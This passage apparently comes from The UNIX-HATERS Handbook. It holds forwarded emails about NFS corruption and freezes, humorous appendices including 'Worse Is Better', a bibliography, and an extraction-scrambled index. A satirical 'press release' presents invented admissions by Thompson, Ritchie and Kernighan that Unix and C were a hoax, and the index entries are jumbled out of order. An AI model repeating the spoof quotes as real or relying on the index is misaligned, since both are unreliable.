Robert 63 Morris. Robert T. Ken xix Pike.xerox. 141 NeXTWORLD Magazine 11 NFS 166. xxxv.mit. 14. see NFS Neuhaus. 194. 231. 141 open 189 exclusive-create 295 Open Look clock tool 123 Open Software Foundation 125 open systems 225. Ed 105 National Security Agency 254 net. 263. xv. 141 newsgroups 96 moderated 97 NeXT 11.lcs. Donald A. Peter 13 New Jersey approach 312 NeWS 128. 257 Moscow International Airport 138 Motif 125 self-abuse kit 138 movemail 246 MSDOS 13. 54. 296 NEXTSTEP 11. Paritosh 81 parallelism 174 Paris. Trudy xxxii Neumann.edu 79. Florence 27 ninit 198 nohistclobber 25 P Pandya. Richard 224. 167 Pier.mit.edu 95 Nietzche 186 Nightingale. 267.gods 98 Netnews 93 Network File System. 293 rename command 190 mt@media-lab. France 86 parsing 177 patch 103 patents xxxiii Ethernet 283 SUID 246 PATH environment variable 249 pavel@parc. Amy xxxii Pensj.edu xxiv. 305 Multics xxi. Rob 27 ping 248 pipes 161 limitations 162 pixel rot 138 Plato’s Cave 176 POP (post office protocol) 246 POSIX 13 . 292 mmap 238 Monty Python and the Holy Grail 140 more 44 Morris.mit. 283–300 Apple Macintosh 284 exports 289 Macintosh 292 magic cookie 284 nfsauth 288 nick@lcs. 230.325 mktmp 287 Mlynarik. 258. 14. Lars 196 Perlis.com 34 PC loser-ing problem 313 PDP-11 6 Pedersen. xxx Novell xix nroff 44 nuclear missiles 117 NYSERnet 299 O Objective-C 11. 307 mv 28. Alan 208 persistency 174 pg 44 pgs@xx. Joseph 5 Oxford English Dictionary 45 N nanny 199 Nather. 141 Ossanna. 253 Open Windows File Manager 129 OpenStep 14. 14. 190 mvdir 276 MX mail servers 89 Norman.
food. 253 Ruby.edu 209 Seastrom. xxxv. Jim 208 round clocks 136 routed 8 Routing Information Protocol (RIP) 7 Roylance. 123 Raymond.edu 50. 62.edu 231 Scheme 173. Marcus J. Rich xxx saus@media-lab. Dennis xxx. 24 SCO 11 screens bit-mapped 111 sdm@cs. 237 rdist 236 read 189 readnews 102 real-time data acquisition 197 rec. 226. 248. 83.mit.recipes 100 recv 189 recvfrom 189 recvmsg 189 Reid.326 Index PostScript 141 power tools 147 pr 175 preface xix process id 39 process substitutuion 152 programmer evolution 215 programming 173 programming by implication 177 Project Athena 288 Pros and Cons of Suns xxiv ps 8. 21. Steve 298 Rolls-Royce 221 Roman numeral system xx root. Strata xxxi Rosenberg. M. see superuser Rose. 239. 29. 65. 315 Schilling. 295 -i 28 rmdir 30. 258 Ritchie. Brian 100 reliability 85 An Empirical Study of the Reliability of Unix Utilities 190 religious ecstasy 161 Request for Comments 77 responsibility 85 Ressler. Steve 275 send 189 sendmail 61. Jerry 298 RPC 292 rs@ai. Eric xxxi RCS 34. Beth xxxi Roskind. 226. 261 security 243 find 166 Sekiguchi. 22. Kurt xxxi Schwartz. 257 >From 79 configuration file 74 history 63 .mit. Dan xxxi S Salz. 63. 65.brown. 307 early Unix distribution 229 rite of passage 23 rk05 229 rlogin 118 rm 18. 248 Rubin. 256. 35. 19. 5. 65. Robert E. 104.uucp 22 Ranum. 280. 50. Paul xxxi. 30. Randal L. 73 pwd 241 Q QuickMail 87 QWERTY 19 R Rainbow Without Eyes 46 ram@attcan. 20. John xxiv Rose. Pete 13 Schmucker. 295 rn 101 rna 102 Robbins. Sandy 37 RFC822 78 RFCs 77 "Right Thing" design approach 311 RISKS 13.
DDN.ac.uk 32 tmb@ai. Christopher 62 Standard I/O library 190 Stanford design style 311 Stanley’s Tool Works 159. Patrick 166 soft clipping 278 Solomon 128 Space Travel 5 Spafford. 245 swapping 230 symbolic link 154 Symbolics (see Lisp Machine) syphilis mercury treatment xx system administration 221 System V sucks 47 Systems Anarchist 50 T Tannenbaum. 275 strings 53 strip xxv stty 119 SUID 245–248 Sun Microsystems 6. Johnny 117 terminfo 114 Tetris 117 TeX 38 tgoto 117 Thanksgiving weekend 241 The Green Berets 180 The Unix Programming Environment 189 Thompson. Japan 86 top 10 reasons why debuggers dump core 188 TOPS. 188. 72. 307 Unix car 17. 209. Olin 116 Silicon Valley 86 Silver. 241. Andy 230 tar 30.mit. 73.edu 173 TNT Toolkit 129 Tokyo.uucp 292 timeval 193 tk@dcs. 10. 19. 166.MIL 86 tcsh 149 teletypes 111 telnet 118. Olin 7.327 sendmail made simple 240 sendmsg 189 sendto 189 set 152 SF-LOVERS 98 SGI Indigo 46 sh 155 variables 159 Shaped Window extension (X) 136 shell programming renaming files 161 shell scripts writing xix Shivers. blood 128 sra@lcs. 185 Tiemann. 160 100-character limit 148. 83. 131 Shulgin. Ken 5. 33. 113. Michael 187. 246 Strassmann. Cliff xxxi.edu 49 Stacy. Gene 106 Spencer. 279 steve@wrs. 271 Smalltalk 173 smL 280 SMTP 64 SOAPBOX_MODE 24 Sobalvarro. 14. 88. 292 superuser 244. 272. Alexander xxxi sidewalk obstruction 68 Siebert.mit.com 276 Stoll.ed. 193 tcp-ip@NIC. Stephen J. 283. 62 Silverio. 252 Tenex 20 TERM and TERMCAP environment variable 118 Termcap 117 termcap 113 Terminal.com 11 sleep 36. C J 56 SimCity xxx Simple and Beautiful mantra 188 simplicity of design 311 simsong@nextworld. A Sun Microsystems Company 292 . Henry 283 spurts. 137. 296 tim@hoptoad. 280. Steve xxix.
Daniel xxix. Miriam xxxi TWENEX-HATERS xxiv Twilight Zone 90 Twinkies 188 tytso@athena.EDU 25 Weise. xxiv. 37 car 17 design xx evolution 7 File System 262 trademark xix Worm 194 Unix Guru Maintenance Manual 58 Unix ohne Worter 56 Unix Programmer 185 Unix Systems Laboratories xix Unix without words 56 UNIX-HATERS acknowledgments xxix authors xxi disclaimer xxxiii history xxiii typographical conventions xxxii Unknown 141. 231.mit.com 86. Len Jr.328 Index TOPS-20 xxi. 93 Travers. xxxi Townson. Bruce 269 Waterside Productions xxxi Watson. Andy xxxi wc 175 WCL toolkit 133 weemba@garnet. Gumby Vinayak 233 Walton. Michael xxiii. Benjamin 191 Wiener. Matthew xxxi Waitzman. 257 touch 30 Tourette’s Syndrome 138 Tower of Babel 126 Tower. 318 UUCP suite 63 uuencode 82–83 UUNET 89 V V project 124 vacation program 84 variable substitution 152 VAX 6 VDT 111 Veritas 267 vi 114. Mark 106 Wall. David xxxi. 143 Visual User Environment 132 VMS 27. 88 University of Maryland xxx University of New South Wales 43 University of Texas. xxxv. 93–109 seven stages 106 Usenix 300 User Datagram Protocol 285 user interface xv. 207 Weise. 103 trusted path 251 Ts’o. 305 trn 101. 197. 132 video display terminal 111 Vinge. Larry 102 Wallace. Vernor 94 Viruses 3. 147 W W Window System 124 Wagner. Theodore 198 tset 118 Tucker. 74 Waks. xxxi. Austin 105 Unix "Philosophy" 37 attitude xx. Matthew P 25 . 112. David xxxi whitespace 181 Whorf.Berkeley. 257 VOID 95 Voodoo Ergonomics 123 VT100 terminal 113 U UDP 285 UFS 262 ULTRIX 11 unalias 152 unicode@sun. Patrick A. 32. 120.edu 198 unset 152 Usenet 35.
50.329 Williams. 206 zsh 149 zvona@gang-of-four.com 295 yduJ@scrc.stanford. 278 writev 189 X X 123–143 Consortium 126 myths 127 toolkits 126 X Window System 113 X/Open xix.symbolics. 130 Zweig. Johnny 116 .com 70 Yedwab. 164. B. Christopher xxxi Windows 10. 56. 124 xtpanel 165 Y yacc 177 yduj@lucid. 166 "Worse is Better" design approach 311 write 189. Jamie 127. Gail 268 Zawinski.edu 37. 135. 13 XAPPLRESDIR environment variable 133 xauth 130 xclock 124 XDrawRectangle 139 Xenix 11 XENVIRONMENT 133 Xerox 283 XFillRectangle 139 XGetDefault 133 xload 124 xrdb 133 xterm 113. 116. Laura xxxi Z Zacharias. 168 Zeta C xxx Zmacs 119 Zorn.
330 Index . | https://www.scribd.com/doc/46198817/Unix-Haters-Handbook | CC-MAIN-2017-09 | refinedweb | 96,039 | 69.48 |
The QNetworkAccessManager class allows the application to send network requests and receive replies.
#include <QNetworkAccessManager>
Note: All functions in this class are reentrant.
This class was introduced in Qt 4.4. One QNetworkAccessManager instance should be enough for the whole Qt application.
Sends a request to delete the resource identified by the URL of request.
Note: This feature is currently available for HTTP only, performing an HTTP DELETE request.
This function was introduced in Qt 4.6.
See also get() and post().
Uploads the contents of data to the destination request and returns a new QNetworkReply object.
This is an overloaded function.
Sends the contents of the data byte array to the destination specified by request.
The.
IReadOnlyList and IReadOnlyDictionary are interfaces that .NET developers have wanted since the very beginning. In addition to providing a sense of symmetry, a read-only interface would eliminate the need to implement methods that would do nothing but throw a NotSupportedException. For reasons lost to time, this wasn’t done.
The next opportunity was with the introduction of generics with .NET 2. This allowed Microsoft to phase out the weakly typed collections and interface and replace them with strongly typed counter-parts. The Base Class Library team again passed on the chance to offer a read-only list, with Kit George writing,
Because we could provide a default implementation for what you're talking about Joe, rather than giving you an interface, we provided ReadOnlyCollectionBase. However, given that it wasn't strongly typed, I can understand a reluctance to use it. But with the introduction of generics, we now also have ReadOnlyCollection<T>, so you get the same functionality, but strongly-typed: awesome!
ReadOnlyCollection<T> isn't sealed, so feel free to write your own collection on top if needed. We have no plans to introduce an interface for this same concept, since the collections we've made for this suit the general need.
Krzysztof Cwalina weighed in on the subject as well,
It may sound surprising, or not, but IList and IList<T> are our interfaces intended for read-only collections. They both have IsReadOnly Boolean property that should return true when implemented by a read-only collection. The reason we don’t want to add a purely read-only interface is that we feel it would add too much unnecessary complexity to the library. Note that by complexity, we mean both the new interface and its consumers.
We feel that API designers either don’t care about checking the IsReadOnly property at runtime and potentially throwing an exception, in which case IList is fine, or they would like to provide a really clean custom API, in which case they explicitly implement IList and publicly expose custom tailored read-only API. The latter is typical for collections exposed form object models.
While developers grumbled about the situation, the new opportunities offered by generics far out-weighed this one sticking point and the issue was largely ignored until .NET 4. However, there are repercussions from this decision that we will discuss later on.
With .NET 4 an exciting new capability was added to the runtime. In previous versions of .NET interfaces were overly restrictive when it came to types. For example, one could not use an object of type IEnumerable<Customer> as a parameter to a function expecting IEnumerable<Person> even though the Customer class inherited from Person. With the addition of covariance support, that limitation was partially lifted.
We say “partially” because there are several scenarios where one would like to use an interface with a richer API than IEnumerable. And while IList isn’t covariant, a read-only list interface would be. Unfortunately the .NET BCL team again decided not to address this oversight.
Then the introduction of WinRT and the resurgence of COM changed everything. COM interoperability was once something developers used when no other options were available, it is now a cornerstone of .NET programming. And since WinRT exposes the interfaces IVectorView<T> and IMapView<K, V>, so must .NET.
A rather interesting feature of the WinRT plan is that it exposes a different, but comparable, API for each development platform. As you may already know, when seen through the eyes of a JavaScript developer all methods are camelCased while C++ and .NET developers see them as PascalCased. Another, more drastic change, is the automatic mapping of interfaces between C++ and .NET. Rather than dealing with the Windows.Foundation.Collections namespace, .NET developers will instead continue using System.Collections.Generic. The interfaces IVectorView<T> and IMapView<K, V> are translated by the runtime into IReadOnlyList<T> and IReadOnlyDictionary<TKey, TValue>.
It is important to note that the C++/WinRT names of the interfaces are somewhat more accurate. These interfaces are intended to represent views into a collection, but they do not ensure the collection itself is immutable. It is a common mistake among even experienced .NET developers to assume that ReadOnlyCollection is an immutable copy of a collection when in fact it is just a wrapper around a live collection. (For more on read-only, frozen, and immutable collections see Andrew Arnott’s post by the same name.)
One may find it interesting to know that IList<T> does not inherit from IReadOnlyList<T>, even though it has all the same members and all lists can be expressed as a read-only list. Immo Landwerth explains,
It looks like a reasonable assumption that it works because the read-only interfaces are purely a subset of the read-write interfaces. Unfortunately, it is incompatible because at the metadata level every method on every interface has its own slot (which makes explicit interface implementations work).
Or in other words, the only opportunity they had to introduce the read-only interfaces as base classes of the mutable variety was back in .NET 2.0 when they were originally conceived. Once released into the wild, the only change that can be made to it is adding the covariant and/or contravariant markers (expressed as “in” and “out” in VB and C#).
When asked why there is no IReadOnlyCollection<T> Immo responded,
We considered this design, but we felt adding a type that only provides a Count property does not add much value to the BCL. In the BCL team we believe that an API start at minus a thousand points and thus providing some value is not good enough to justify being added. The reason that adding new APIs also has cost, for example developers have more concepts to choose from. Initially we thought that adding this type would allow code to gain better perf in scenarios where you just want to get the count and then do some interesting stuff with it. For example, bulk adding to an existing collection. However, for those scenarios we already encourage people to just take an IEnumerable<T> and special case having the instance implementing ICollection<T> too. Since all of our built-in collection types implement this interface there are no perf gains in the most common scenarios. BTW, the Count() extension methods on IEnumerable<T> do this as well.
The new interfaces are available for .NET 4.5 and .NET for Windows 8.
Incorrect, by Daniel Bullington
Co-variance and contra-variance was supported in .NET 2.0 and above at the CLR level. The C#/VB compilers did not expose this until .NET 4.0.
Re: Incorrect | http://www.infoq.com/news/2011/10/ReadOnly-WInRT/ | CC-MAIN-2014-15 | refinedweb | 1,118 | 53.81 |
Implementing Laziness in C
The aim of this blog post is to explain Haskell's (specifically, GHC's) evaluation model without having to jump through too many hoops. I'll explain how pervasive non-strictness is when it comes to Haskell, and why compiling non-strictness is an interesting problem.
Showing off non-strictness:
We first need a toy example to work with to explain the fundamentals of non-strict evaluation, so let's consider the example below. I'll explain the `case` construct.
Code
```
-- Core-like pseudocode for the example discussed below
one = 1           -- a plain value
loopy = loopy     -- an infinite loop

kCombinator x y = x   -- K returns its first argument, ignoring the second

main = case kCombinator one loopy of  -- force the result of K
         kret -> case kret of         -- force kret itself
                   i -> printPrimInt i
```
A quick explanation about `case`:

`case` is a language construct that forces evaluation. In general, no value is evaluated unless it is forced by a `case`.
Analysing the example:
The strict interpretation:

If we were coming from a strict world, we would have assumed that the expression `K one loopy` would first try to evaluate the arguments, `one` and `loopy`. Evaluating `one` would succeed, yielding `1`, but evaluating `loopy` would loop forever, so under the strict interpretation the program would never halt.
The non-strict interpretation:

In the non-strict world, we try to evaluate `K(1, loopy)`, since we are asked for its result by the `case` expression. However, we do not try to evaluate `loopy`, since no one has asked what its value is!

Now, we know that `kCombinator x y = x`. Therefore, `kCombinator one loopy = one`, regardless of what value `loopy` holds. So, at the case expression:

```
main = case K(one, loopy) of -- force K to be evaluated with a `case`
         kret -> ...
```

Since `kret = one`, we can continue with the computation.
Here, we force `kret` (which has value `one`) to be evaluated with `case kret of ...`. Since `one = 1`, `i` is bound to the value `1`. Once `i` is returned, we print it out with `printPrimInt(primx)`. The output of the program under non-strict interpretation is for it to print out `1`.
Where does the difference come from?
Clearly, there is a divide: strict evaluation tells us that this program should never halt. Non-strict evaluation tells us that this program will print an output!
To formalize a notion of strictness, we need a notion of bottom (`_|_`). A value is said to be bottom if, in trying to evaluate it, we reach an undefined state. (TODO: refine this, ask ben).

The identity function `id x = x` is strict, since `id(bottom) = bottom`.

const

```
const_one x = 1
const_one(bottom) = 1
const_one(3) = 1
```

`const_one` is not strict, as `const_one(bottom) /= bottom`.

K

```
K x y = x
K 1 2 = 1
K 1 bottom = 1
K bottom 2 = bottom
```

Note that `K(bottom, y) = bottom`, so K is strict in its first argument, and `K(x, bottom) /= bottom`, so K is non-strict in its second argument. This is a neat example showing how a function can be strict and lazy in different arguments of the function.
Compiling non-strictness, v1:
How does GHC compile non-strictness?
GHC (the Glasgow Haskell Compiler) internally uses multiple intermediate representations, in order, from the original source to what is finally produced:
- Haskell (the source language)
- Core (a minimal set of constructs to represent the source language)
- STG (Spineless tagless G-machine, a low-level intermediate representation that accurately captures non-strict evaluation)
- C– (A C-like language with GHC-specific customization to support platform-independent code generation).
- Assembly
Here, I will show how to lower simple non-strict programs from a fictitious Core-like language down to C, while skipping STG, since it doesn't really add anything to the high-level discussion at this point.
Our example of compiling non-strictness
Now, we need a strategy to compile the non-strict version of our program. Clearly, C cannot express laziness directly, so we need some other mechanism to implement this. I will first code-dump, and then explain as we go along.
Source code
```c
#include <assert.h>
#include <stdio.h>

/* Minimal sketch of the scheme: every possibly-lazy value is "Boxed",
 * a function pointer that computes the underlying value when called. */

typedef int (*Boxed)(void);

int one(void) { return 1; }      /* one = 1 */

int loopy(void) {                /* loopy = loopy: forcing this loops forever */
    for (;;) {}
}

/* kCombinator x y = x: hand back the first box without forcing either */
Boxed kCombinator(Boxed x, Boxed y) {
    (void)y;                     /* y is never forced */
    return x;
}

void printPrimInt(int i) { printf("%d\n", i); }

int main(void) {
    /* case kCombinator one loopy of kret -> ... */
    Boxed kret = kCombinator(one, loopy);
    /* case kret of i -> printPrimInt i */
    int i = kret();              /* forcing kret calls one(), yielding 1 */
    printPrimInt(i);             /* prints 1; loopy was never called */
    return 0;
}
```
We convert every possibly lazy value into a `Boxed` value, which is a function pointer that knows how to compute the underlying value. When the lazy value is forced by a `case`, we call the `Boxed` function to compute the output.
This is a straightforward way to encode non-strictness in C. However, do note that this is not lazy, because a value could get recomputed many times. Laziness guarantees that a value is only computed once and is later memoized.
Compiling with a custom call stack / continuations
As one may notice, we currently use the native call stack every time we force a lazy value. However, in doing so, we might actually run out of stack space, which is undesirable. Haskell programs like to have "deep" chains of values being forced, so we would quite likely run out of stack space.

Therefore, GHC opts to manage its own call stack on the heap. The generated code looks as you would imagine: we maintain a stack of function pointers plus auxiliary data (stack-saved values), and we push and pop over this "stack". When we run out of space, we <find correct way to use mmap>.
Source code
```c
#include <assert.h>
#include <stdio.h>

/* Minimal sketch of the scheme: a heap-managed stack of continuations
 * replaces the native call stack. "Returning" a forced value means
 * popping the top continuation and entering it with the value. */

typedef void (*Continuation)(int value);

#define STACK_SIZE 4096
static Continuation contStack[STACK_SIZE];
static int contTop = 0;

void pushContinuation(Continuation k) {
    assert(contTop < STACK_SIZE);
    contStack[contTop++] = k;
}

void returnValue(int v) {        /* pop and enter the next continuation */
    assert(contTop > 0);
    contStack[--contTop](v);
}

void one(void) { returnValue(1); }   /* one = 1 */

void printPrimInt(int i) { printf("%d\n", i); }

/* case kCombinator one loopy of kret -> case kret of i -> printPrimInt i */
void kretContinuation(int kret) {
    printPrimInt(kret);              /* the inner case: kret is forced here */
}

void kCombinatorOneLoopy(void) {
    one();                       /* K enters its first argument; loopy never runs */
}

int main(void) {
    pushContinuation(kretContinuation);  /* what to do with the case result */
    kCombinatorOneLoopy();               /* enter the scrutinee */
    return 0;
}
```
We maintain our own "call stack" of continuations. These continuations are precisely the parts of the code that deal with the return value of a `case`. Every

`case x of xeval -> expr`

compiles to:

`pushContinuation(XEvalContinuation); x()`
That is, push a continuation, and then "enter" into `x`. A `call` instruction uses the stack to set up a stack frame, under the assumption that we will `ret` at some point. But, clearly, under our compilation model, we will never `ret`; we simply call more functions. So, we don't need the state maintained by a `call`. We can simply `jmp`.
Wrapping up
I hope I've managed to convey the essence of how to compile Haskell. I skipped a couple of things:
- Haskell data types: sum and product types. These are straightforward; they just compile to tagged structs.
- let bindings: These too are straightforward, but come with certain restrictions in STG. It's nothing groundbreaking, and is well written in the paper.
- Black holes: Currently, we are not truly lazy, in that we do not update values once they are computed.
- GC: how to weave the GC through the computation is somewhat non-trivial.
All of this is documented in the excellent paper: Implementing lazy languages on stock hardware.
Appendix: Non-strict versus Lazy
I have used the word non-strict throughout, and not lazy. There is a technical difference between the two, which is that:

- non-strict is an evaluation-order detail that guarantees that values are evaluated only when they are demanded;
- lazy is one way to implement non-strict, which additionally guarantees that a value will not be evaluated twice.
For example, consider the small haskell snippet:
```
f :: Int -> Int -> Int
f x y = x * x

loop :: a
loop = loop

main :: IO ()
main = let a = 10 + 10 in print (f a loop)
```
We expect that the program will never evaluate `y = loop`, because `f` does not use `y` anywhere. We want the program to return the answer:

`f a loop = (10 + 10) * (10 + 10) = 20 * 20 = 400`
However, we don't really care whether the program is evaluated using lazy evaluation, where `a` is computed once and shared, or whether the expression `a` is evaluated twice.
See that both these programs compute the same answer, but do so differently. In the former case of lazy evaluation, the variable `a` is shared across both occurrences: it is computed once, and the result is reused. In the latter case of non-strict evaluation, we see that the variable `a` is evaluated twice independently, once for each occurrence of `a`.
There are trade-offs with both approaches. In the lazy evaluation case, we are guaranteed that a large expression will not be evaluated twice. On the flip side, in the case of non-strict evaluation, since we can evaluate the same expression multiple times, we can exploit parallelism: two cores can conceivably compute `10 + 10` in parallel to arrive at `20`. This is in contrast to the lazy evaluation case, where this is not allowed, since the compiler must guarantee that an expression is evaluated at most once. If the same expression `10 + 10` is evaluated on two cores (in parallel), it is still evaluated twice! So there is a trade-off between guarantees to the end user (that an expression will not be evaluated twice) and freedom for the compiler (to evaluate in parallel). This is a common theme in language and compiler design, and one I find very interesting.
the MRUnit framework.
- Add the necessary dependency to the pom
Add the following dependency to the pom:
```xml
<dependency>
    <groupId>org.apache.mrunit</groupId>
    <artifactId>mrunit</artifactId>
    <version>1.0.0</version>
    <classifier>hadoop1</classifier>
    <scope>test</scope>
</dependency>
```
This will make the MRUnit framework available to the project.
- Add Unit tests for testing the Map Reduce logic
The use of this framework is quite straightforward, especially in our business case. So I will just show the unit test code with some comments where necessary; I think it is quite obvious how to use it. The unit test for the Mapper, ‘MapperTest’:
package net.pascalalma.hadoop;

import org.apache.hadoop.io.Text;
import org.apache.hadoop.mrunit.mapreduce.MapDriver;
import org.junit.Before;
import org.junit.Test;

import java.io.IOException;

/**
 * Created with IntelliJ IDEA.
 * User: pascal
 */
public class MapperTest {

    MapDriver<Text, Text, Text, Text> mapDriver;

    @Before
    public void setUp() {
        WordMapper mapper = new WordMapper();
        mapDriver = MapDriver.newMapDriver(mapper);
    }

    @Test
    public void testMapper() throws IOException {
        mapDriver.withInput(new Text("a"), new Text("ein"));
        mapDriver.withInput(new Text("a"), new Text("zwei"));
        mapDriver.withInput(new Text("c"), new Text("drei"));
        mapDriver.withOutput(new Text("a"), new Text("ein"));
        mapDriver.withOutput(new Text("a"), new Text("zwei"));
        mapDriver.withOutput(new Text("c"), new Text("drei"));
        mapDriver.runTest();
    }
}
This test class is actually even simpler than the Mapper implementation itself. You just define the input of the mapper and the expected output, and then let the configured MapDriver run the test. In our case the Mapper doesn’t do anything specific, but you see how easy it is to set up a test case. For completeness, here is the test class of the Reducer:
package net.pascalalma.hadoop;

import org.apache.hadoop.io.Text;
import org.apache.hadoop.mrunit.mapreduce.ReduceDriver;
import org.junit.Before;
import org.junit.Test;

import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

/**
 * Created with IntelliJ IDEA.
 * User: pascal
 */
public class ReducerTest {

    ReduceDriver<Text, Text, Text, Text> reduceDriver;

    @Before
    public void setUp() {
        AllTranslationsReducer reducer = new AllTranslationsReducer();
        reduceDriver = ReduceDriver.newReduceDriver(reducer);
    }

    @Test
    public void testReducer() throws IOException {
        List<Text> values = new ArrayList<Text>();
        values.add(new Text("ein"));
        values.add(new Text("zwei"));
        reduceDriver.withInput(new Text("a"), values);
        reduceDriver.withOutput(new Text("a"), new Text("|ein|zwei"));
        reduceDriver.runTest();
    }
}
- Run the unit tests
With the Maven command “mvn clean test” we can run the tests:
With the unit tests in place, I would say we are ready to build the project and deploy it to a Hadoop cluster, which I will describe in the next post.
2 Comments on "Unit testing a Java Hadoop job"
Hi,
First of all thanks a lot for the example.
I am getting this error while running the test case .
ERROR util.Shell: Failed to locate the winutils binary in the hadoop binary path
java.io.IOException: Could not locate executable null\bin\winutils.exe in the Hadoop binaries.
)
When I googled it, all the answers I found were for this problem happening in an actual Hadoop environment; I am not sure how to remove this from the JUnit run.
Hi Koushik,
It appears that to have Hadoop running on Windows, some native libraries need to be installed. It is discussed here:
I am not using Windows so I haven’t run into this issue, but it sounds like the link should help you out. | https://www.javacodegeeks.com/2013/09/unit-testing-a-java-hadoop-job.html | CC-MAIN-2018-09 | refinedweb | 558 | 53.27 |
While fitting our model, we might get lucky and happen to draw a favourable test dataset while splitting. The model might also overfit or underfit. It is therefore suggested to perform cross validation, i.e. splitting several times and thereafter taking the mean of our accuracy.

So this recipe is a short example of how to do cross validation on a time series. Let's get started.
import numpy as np
import pandas as pd
from statsmodels.tsa.arima_model import ARMA
from sklearn.model_selection import TimeSeriesSplit
from sklearn.metrics import mean_squared_error
Let's pause and look at these imports. Numpy and pandas are general ones. Here, statsmodels.tsa.arima_model is used to import the ARMA class for building the model. TimeSeriesSplit will help us with easy, time-ordered splitting while performing cross validation.
df = pd.read_csv('', parse_dates=['date'])
df.head()
Here, we have used a time-series dataset from GitHub.
Now our dataset is ready.
tscv = TimeSeriesSplit(n_splits = 4)
rmse = []

for train_index, test_index in tscv.split(df):
    cv_train, cv_test = df.iloc[train_index], df.iloc[test_index]
    model = ARMA(cv_train.value, order=(0, 1)).fit()
    predictions = model.predict(cv_test.index.values[0], cv_test.index.values[-1])
    true_values = cv_test.value
    rmse.append(np.sqrt(mean_squared_error(true_values, predictions)))
Firstly, we have set the number of splits to 4. Then we loop for our cross validation. Each time, the dataset is split into train and test datasets; the model is fitted on the training data, predictions are made, and the RMSE (accuracy) is calculated for each split.
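To make the fold layout concrete, here is a small self-contained sketch (not part of the original recipe) showing that TimeSeriesSplit always places each test fold strictly after its training fold:

```python
import numpy as np
from sklearn.model_selection import TimeSeriesSplit

# Ten dummy samples are enough to see the expanding-window pattern.
X = np.arange(10)
tscv = TimeSeriesSplit(n_splits=4)

for train_index, test_index in tscv.split(X):
    # The training fold always ends before the test fold begins,
    # so no future observations leak into model fitting.
    assert train_index.max() < test_index.min()
    print(train_index.tolist(), test_index.tolist())

# Prints:
# [0, 1] [2, 3]
# [0, 1, 2, 3] [4, 5]
# [0, 1, 2, 3, 4, 5] [6, 7]
# [0, 1, 2, 3, 4, 5, 6, 7] [8, 9]
```

This is why TimeSeriesSplit is preferred over a shuffled KFold for time series: shuffling would let the model train on observations that come after the ones it is asked to predict.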
print(np.mean(rmse))
Here, we have printed the mean of the RMSE values collected across all splits.
Once we run the above code snippet, we will see:
6.577393548356742
You might get a slightly different result, but it will be close to the value given here due to the limited number of splits.
There are three types of commenting syntax in C#: multiline, single-line, and XML.
Multiline Comments
Multiline comments have one or more lines of narrative within a set of comment delimiters. These comment delimiters are the begin comment /* and end comment */ markers. Anything between these two markers is considered a comment. The compiler ignores comments when reading the source code. Lines 1 through 4 of Listing 1 show a multiline comment. For convenience, Lines 1 through 4 of Listing 1 are repeated here.
1: /*
2:  * FileName: HowdyPartner.cs
3:  * Author: Joe Mayo
4:  */
Some languages allow embedded multiline comments, but C# does not. Consider the following example:
1: /*
2:    Filename: HowdyPartner.cs
3:    Author: Joe Mayo
4:    /*
5:       Initial Implementation: 04/01/01
6:       Change 1: 05/15/01
7:       Change 2: 06/10/01
8:    */
9: */
The begin comment on Line 1 starts a multiline comment. The second begin comment on Line 4 is ignored in C# as just a couple of characters within the comment. The end comment on Line 8 matches the begin comment on Line 1. Finally, the end comment on Line 9 causes the compiler to report a syntax error because it doesn't match a begin comment.
Single-Line Comments
Single-line comments allow narrative on only one line at a time. They begin with the double forward slash marker, //. The single-line comment can begin in any column of a given line. It ends at a new line or carriage return. Lines 6, 9, and 12 of Listing 1 show single-line comments. These lines are repeated here for convenience.
6: // Program start class
7: public class HowdyPartner
8: {
9:    // Main begins program execution
10:    public static void Main()
11:    {
12:       // Write to console
13:       System.Console.WriteLine("Howdy, Partner!");
Single-line comments may contain other single-line comments. Because they're all on the same line, subsequent comments will be treated as comment text.
XML Documentation Comments
XML documentation comments start with a triple slash, ///. Comments are enclosed in XML tags. The .NET C# compiler has an option that reads the XML documentation comments and generates XML documentation from them. This XML documentation can be extracted to a separate XML file. Then XML style sheets can be applied to the XML file to produce fancy code documentation for viewing in a browser. Table 1 shows all standard XML documentation tags.
Table 1 XML Documentation Tags
To provide a summary of an item, use the <summary> tag. Here's what one might look like for a Main() method:
/// <summary>
/// Prints "Howdy, Partner" to the console.
/// </summary>
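For illustration, here is a hedged sketch (the method and its names are invented for this example, not taken from the article) combining several of the standard tags on one method:

```csharp
/// <summary>
/// Builds a greeting for the given partner.
/// </summary>
/// <param name="name">The partner to greet.</param>
/// <returns>The complete greeting string.</returns>
public static string Greet(string name)
{
    return "Howdy, " + name + "!";
}
```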
Documentation comments can be extremely useful in keeping documentation up-to-date. How many programmers do you know who conscientiously update their documentation all the time? Seriously, when meeting a tight deadline, documentation is the first thing to go. Now there's help. While in the code, it's easy to update the comments, and the resulting XML file is easy to generate. The following line of code will extract documentation comments from the HowdyPartner.cs file and create an XML document named HowdyPartner.xml.
csc /doc:HowdyPartner.xml HowdyPartner.cs
For C++ Programmers
C# has XML documentation comments that can be extracted to separate XML files. Once in an XML file, XML style sheets can be applied to produce fancy code documentation for viewing in a browser. | http://www.informit.com/articles/article.aspx?p=23211&seqNum=3 | CC-MAIN-2018-13 | refinedweb | 561 | 57.98 |
Red Hat Bugzilla – Bug 91677
Griffin Powermate needs additional info in usb.handmap
Last modified: 2014-03-16 22:36:28 EDT
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4b) Gecko/20030508
Description of problem:
The Griffin Powermate needs additional info in /etc/hotplug/usb/handmap to function properly with the standard Linux kernel driver as shipped with RH9. Basically it too (like the Wacom devices mentioned in the same file) needs the evdev driver, even though it does not formally depend on it.
Adding the following lines to usb.handmap fixes the problem:
evdev 0x0003 0x077d 0x0410 0x0000 0x0000 0x00 0x00 0x00 0x00 0x00 0x00 0x00000000
evdev 0x0003 0x077d 0x04aa 0x0000 0x0000 0x00 0x00 0x00 0x00 0x00 0x00 0x00000000
To test use the tools on:
The following is an example test session for the python script:
$ python
>>> import powermate
>>> p = powermate.PowerMate()
...it will throw an exception if it doesn't find the PowerMate.
Or even simpler: cat /dev/input/event0. If the device node is there, then it won't say device not found.
Ref for Powermate product:
Version-Release number of selected component (if applicable):
2002_04_01-17
How reproducible:
Always
Steps to Reproduce:
1. Try using the example code above, or catting /dev/input/event0 when the PowerMate is plugged in.
2. /var/log/messages also tells you the device has not been recognised if evdev is not loaded.
Actual Results: PowerMate tools don't work.
Expected Results: Powermate tools should have worked.
Additional info:
Added in 2004_09_23-1.
